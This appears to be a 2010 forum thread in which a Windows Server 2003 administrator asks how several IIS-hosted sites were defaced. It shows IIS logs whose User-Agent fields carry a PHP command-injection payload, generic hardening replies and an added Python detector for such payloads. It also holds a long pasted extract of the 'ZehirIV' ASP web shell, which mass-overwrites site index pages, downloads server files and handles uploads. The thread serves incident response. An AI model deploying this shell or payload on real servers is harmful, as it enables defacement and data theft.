  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1551

Windows Server 2003 server hack issue


Recently our server was hacked by pakbugs.
I don't understand how the hacker created and replaced some home pages (default.htm, index.htm, default.asp) without logging in to the server or FTP access.

Kindly help me to secure my server.

The following things are running on our server:

IIS 6.0
Tomcat 5
Merak mailserver
ColdFusion 4.5

I have checked the following logs but am unable to understand the issue.

First website hack logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 14:48:39
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-07 14:48:39 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 123.201.132.126 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0;+GTB6.3;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+InfoPath.2) - delldigitalschoolathon.com 403 14 5 437
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 03:58:18
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 656
2010-01-08 03:58:17 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 03:58:24 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 3531
2010-01-08 03:59:12 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 03:59:13 W3SVC1896362308 WTRS10138 198.65.102.164 GET /index.htm - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
2010-01-08 04:00:03 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 116.71.210.16 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 406
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 04:24:28
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 04:24:28 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 734
2010-01-08 04:24:58 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 121.242.204.200 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+GTB6.3;+InfoPath.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - www.delldigitalschoolathon.com 403 14 5 453
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:50:24
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 05:50:23 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 703
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 2640
2010-01-08 05:50:26 W3SVC1896362308 WTRS10138 198.65.102.164 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 403 14 5 453
2010-01-08 05:50:27 W3SVC1896362308 WTRS10138 198.65.102.164 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 404 0 2 281
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 3421
2010-01-08 05:50:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/? delldigitalschoolathon.com 200 0 0 625
2010-01-08 05:50:56 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - delldigitalschoolathon.com 200 0 0 578
2010-01-08 05:50:57 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://delldigitalschoolathon.com/ delldigitalschoolathon.com 200 0 0 562
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:12:49 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0) - delldigitalschoolathon.com 200 0 0 484
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:37:51
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken

+++++++++++
I also got a hacked website entry at http://zone-h.org
http://zone-h.org/mirror/id/10095659

2010-01-08 06:37:51 W3SVC1896362308 WTRS10138 198.65.102.164 GET /Default.htm - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) http://zone-h.org/mirror/id/10095659 delldigitalschoolathon.com 200 0 0 875
2010-01-08 06:37:59 W3SVC1896362308 WTRS10138 198.65.102.164 GET /admin - 80 - 210.212.184.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) - delldigitalschoolathon.com 404 0 2 296

+++++++++++++++++++++++++++++++++++++++++
+++++++++++++
Second website logs
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-07 12:01:12
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-07 12:01:11 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 208.91.115.10 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.7.5)+Gecko/20041107+Firefox/1.0 - aqr.tyroo.com 403 14 5 468
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:52:45
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 403 14 5 734
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:52:47 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 404 0 2 281
2010-01-08 05:53:08 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 200 0 0 1078
2010-01-08 05:53:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> http://aqr.tyroo.com/ aqr.tyroo.com 200 0 0 640
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:12:48 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0) - aqr.tyroo.com 200 0 0 250
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 07:43:17
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 http://zone-h.org/mirror/id/10095660 aqr.tyroo.com 200 0 0 734
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
2010-01-08 07:43:20 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 - aqr.tyroo.com 404 0 2 203
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 08:31:04
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 08:31:03 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 859
2010-01-08 08:31:04 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 343
2010-01-08 08:31:07 W3SVC1651598421 WTRS10138 198.65.134.58 GET /favicon.ico - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 404 0 2 328
2010-01-08 08:31:09 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 121.242.197.70 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7+(.NET+CLR+3.5.30729) - aqr.tyroo.com 403 14 5 531
++++++++++++++++

I also found an entry
http://zone-h.org/mirror/id/10095659


Regards,
Naresh
0
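An added example, not part of the original post: a parser for the W3C extended log format shown in the question that flags requests whose User-Agent, Referer or query string carries embedded script code (such as the `<?+passthru(...)` string in these entries) and summarises what each flagged client requested. The function names and the marker list are assumptions made for this example; the sample entries are copied from the "Second website logs" above.

```python
import re
from collections import defaultdict

# Entries copied from the "Second website logs" in the question (IIS 6.0, W3C extended).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 05:52:45
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 05:52:44 W3SVC1651598421 WTRS10138 198.65.134.58 GET / - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 403 14 5 734
2010-01-08 05:53:08 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 119.153.6.41 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+<?+passthru($_GET['cmd']);+?> - aqr.tyroo.com 200 0 0 1078
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-01-08 06:12:49
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status sc-substatus sc-win32-status time-taken
2010-01-08 06:12:48 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 217.162.28.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.1;+Trident/4.0) - aqr.tyroo.com 200 0 0 250
2010-01-08 07:43:17 W3SVC1651598421 WTRS10138 198.65.134.58 GET /Default.htm - 80 - 213.6.216.139 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+ar;+rv:1.9.1.7)+Gecko/20091221+Firefox/3.5.7 http://zone-h.org/mirror/id/10095660 aqr.tyroo.com 200 0 0 734
"""

# Client-controlled fields that a browser never fills with server-side code.
INSPECTED_FIELDS = ("cs(User-Agent)", "cs(Referer)", "cs-uri-query")

# Marker list is an assumption for this example: script delimiters, PHP
# superglobals and a few command-execution calls.
CODE_MARKERS = re.compile(
    r"<\?|<%|<script|\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|\b(?:passthru|shell_exec|eval)\s*\(",
    re.IGNORECASE,
)


def parse_w3c(log_text):
    """Yield one dict per entry, keyed by the most recent #Fields directive."""
    fields = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            # IIS rewrites the header block on every restart; only #Fields matters.
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # wrapped or truncated entry, cannot be mapped reliably
        yield dict(zip(fields, values))


def find_injected_requests(log_text):
    """Return entries whose inspected fields contain a code marker."""
    findings = []
    for rec in parse_w3c(log_text):
        for name in INSPECTED_FIELDS:
            # IIS writes spaces inside a field as '+'.
            decoded = rec.get(name, "-").replace("+", " ")
            match = CODE_MARKERS.search(decoded)
            if match:
                findings.append({
                    "when": rec.get("date", "") + " " + rec.get("time", ""),
                    "client": rec.get("c-ip", "-"),
                    "method": rec.get("cs-method", "-"),
                    "uri": rec.get("cs-uri-stem", "-"),
                    "status": rec.get("sc-status", "-"),
                    "field": name,
                    "marker": match.group(0),
                })
                break  # one finding per entry is enough
    return findings


def summarise_by_client(findings):
    """Group flagged entries by client IP: methods, status codes and URIs seen."""
    summary = defaultdict(lambda: {"methods": set(), "statuses": set(), "uris": set()})
    for f in findings:
        entry = summary[f["client"]]
        entry["methods"].add(f["method"])
        entry["statuses"].add(f["status"])
        entry["uris"].add(f["uri"])
    return dict(summary)


if __name__ == "__main__":
    hits = find_injected_requests(SAMPLE_LOG)
    for client, info in summarise_by_client(hits).items():
        print(client, sorted(info["methods"]), sorted(info["statuses"]), sorted(info["uris"]))
```

On the sample, the flagged client issued only GET requests, which is worth noting when looking for the request that actually wrote the files.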
1 Solution
 
senad Commented:
get a good firewall
make password policy of at least 15 characters (10 letters - 5 numbers)
example :
1A2BB3CCC4DDDD5X
etc...
0
 
sitg (Author) Commented:
We are using Windows Firewall and a good password (including spaces).
I need to report how the server was hacked; kindly help me troubleshoot this.

0
 
senad Commented:
windows firewall is good for nothing.
Here read :
http://www.experts-exchange.com/Security/Misc/Q_21627533.html
0

 
govindarajan78 Commented:
If you have your own server, restrict FTP access to certain IPs. That will help a lot.

Define the default document in IIS, and remove unnecessary default documents for a site.

Check the program code properly for SQL injection possibilities.

By the way,
create a new folder and configure the site when you put the site up again.

Have a good antivirus [like Symantec Endpoint Protection] that detects unauthorized entries and injections.

Hope this helps.

0
 
govindarajan78 Commented:
You can use FileZilla for FTP; it's free.
0
 
sitg (Author) Commented:
Hi,
Somebody tried to use the attached code on our server.


Regards,
Naresh

<% 
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
	Response.End
end if
if Request("kuskapani")=2 then
	on error resume next
	path = Request("path")
	sFolder = Request("SubFolder")
	fName = Request("FileName")
	d1 = Request("dosya1")
	d2 = Request("dosya2")
	d3 = Request("dosya3")
	d4 = Request("dosya4")
	bg__ = Request.Form("selectColour")
	if bg__ = "0" then bg__ = "#ffffff"
	byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>powered by Z" & Session("n2") & "3 ;)</font>"
	
	sFolder = Replace(sFolder,"/","\")

	if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
	Set f = objFSO.GetFolder(Path)
	Set fc = f.SubFolders
	h__ = 0
	f__ = 0
	ss__ = now
	For Each f1 In fc
		hedef_ = replace(f1.path,"/","\")
		if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
		hedef__ = left(hedef_,len(hedef_)-1)
		folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
			if d1<>"" then d1 = true
			if d2<>"" then d2 = true
			if d3<>"" then d3 = true
			if d4<>"" then d4 = true
			on error goto 0:on error resume next
			if fName<>"" then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
				MyFile.write byMesaj
			end if
			if d1 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
				MyFile.write byMesaj
			end if
			if d2 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
				MyFile.write byMesaj
			end if
			if d3 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
				MyFile.write byMesaj
			end if
			if d4 then
				Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
				MyFile.write byMesaj
			end if

			if err<>0 then
				response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
				f__ = f__ + 1
			else
				response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
				h__ = h__ + 1
			end if
	Next
	ss___ = now
	response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
	response.End
end if

status = Request("status")
path   = Request("path")
dPath  = Request("dPath")
arama  = Request("txArama")
dkayit = Request("dkayit")
table  = Request("table")
del    = Request("del")
islem  = Request("islem")
strSQL = Request("strSQL")
cf	   = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") 
if status="" then status=2
popup = true
'////////////////////////////////
Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
    Response.Buffer=True
    Set Fil = objFSO.GetFile(pathfile)
	
    Response.contenttype="application/force-download"
	Response.AddHeader "Cache-control","private"
    Response.AddHeader "Content-Length", Fil.Size
    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name

	Response.BinaryWrite readBinaryFile(Fil.path)
    Set f = Nothing: Set Fil = Nothing
	response.End()
end if
'//////////////////////////////////
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>"" then response.Write byMsg
response.Write "<title>[AhmetDeniz.Org] ZehirIV --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
if popup then
%>
<center>
<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
<script language=javascript>
	function sistemBilgisi(yol){
		NewWindow(yol,"",600,240,"no");
	}
	function SitelerTestte(yol){
		NewWindow(yol,"",530,420,"no");
	}
	function klasorIslemleri(yol){
		NewWindow(yol,"",400,280,"no");
	}
	function sqlServer(yol){
		NewWindow(yol,"",300,50,"no");
	}
	function poweredby(yol){
		NewWindow(yol,"",300,50,"no");
	}
	function sistemTest(yol){
		NewWindow(yol,"",400,300,"no");
	}
</script>
<%
end if
'####################################
Class clsUpload
	Private mbinData
	Private mlngChunkIndex
	Private mlngBytesReceived
	Private mstrDelimiter
	Private CR
	Private LF
	Private CRLF
	Private mobjFieldAry()
	Private mlngCount
	
	Private Sub RequestData
		Dim llngLength
		mlngBytesReceived = Request.TotalBytes
		mbinData = Request.BinaryRead(mlngBytesReceived)
	End Sub

	Private Sub ParseDelimiter()
		mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
	End Sub

	Private Sub ParseData()
		Dim llngStart
		Dim llngLength
		Dim llngEnd
		Dim lbinChunk
		llngStart = 1
		llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
		While Not llngStart = 0
			llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
			llngLength = llngEnd - llngStart
			lbinChunk = MidB(mbinData, llngStart, llngLength)
			Call ParseChunk(lbinChunk)
			llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
		Wend
	End Sub

	Private Sub ParseChunk(ByRef pbinChunk)
		Dim lstrName
		Dim lstrFileName
		Dim lstrContentType
		Dim lbinData
		Dim lstrDisposition
		Dim lstrValue
		lstrDisposition = ParseDisposition(pbinChunk)
		lstrName = ParseName(lstrDisposition)
		lstrFileName = ParseFileName(lstrDisposition)
		lstrContentType = ParseContentType(pbinChunk)
		If lstrContentType = "" Then
			lstrValue = CStrU(ParseBinaryData(pbinChunk))
		Else
			lbinData = ParseBinaryData(pbinChunk)
		End If
		Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
	End Sub

	Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
		Dim lobjField
		ReDim Preserve mobjFieldAry(mlngCount)
		Set lobjField = New clsField
		lobjField.Name = pstrName
		lobjField.FilePath = pstrFileName				
		lobjField.ContentType = pstrContentType
		If LenB(pbinData) = 0 Then
			lobjField.BinaryData = ChrB(0)
			lobjField.Value = pstrValue
			lobjField.Length = Len(pstrValue)
		Else
			lobjField.BinaryData = pbinData
			lobjField.Length = LenB(pbinData)
			lobjField.Value = ""
		End If
		Set mobjFieldAry(mlngCount) = lobjField
		mlngCount = mlngCount + 1
	End Sub

	Private Function ParseBinaryData(ByRef pbinChunk)
		Dim llngStart
		llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
		If llngStart = 0 Then Exit Function
		llngStart = llngStart + 4
		ParseBinaryData = MidB(pbinChunk, llngStart)
	End Function

	Private Function ParseContentType(ByRef pbinChunk)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 15
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
	End Function

	Private Function ParseDisposition(ByRef pbinChunk)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 22
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
	End Function

	Private Function ParseName(ByRef pstrDisposition)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStr(llngStart + 6, pstrDisposition, """")
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 6
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseName = Mid(pstrDisposition, llngStart, llngLength)
	End Function
' ------------------------------------------------------------------------------
	Private Function ParseFileName(ByRef pstrDisposition)
		Dim llngStart
		Dim llngEnd
		Dim llngLength
		llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
		If llngStart = 0 Then Exit Function
		llngEnd = InStr(llngStart + 10, pstrDisposition, """")
		If llngEnd = 0 Then Exit Function
		llngStart = llngStart + 10
		If llngStart >= llngEnd Then Exit Function
		llngLength = llngEnd - llngStart
		ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
	End Function

	Public Property Get Count()
		Count = mlngCount
	End Property

	Public Default Property Get Fields(ByVal pstrName)
		Dim llngIndex
		If IsNumeric(pstrName) Then
			llngIndex = CLng(pstrName)
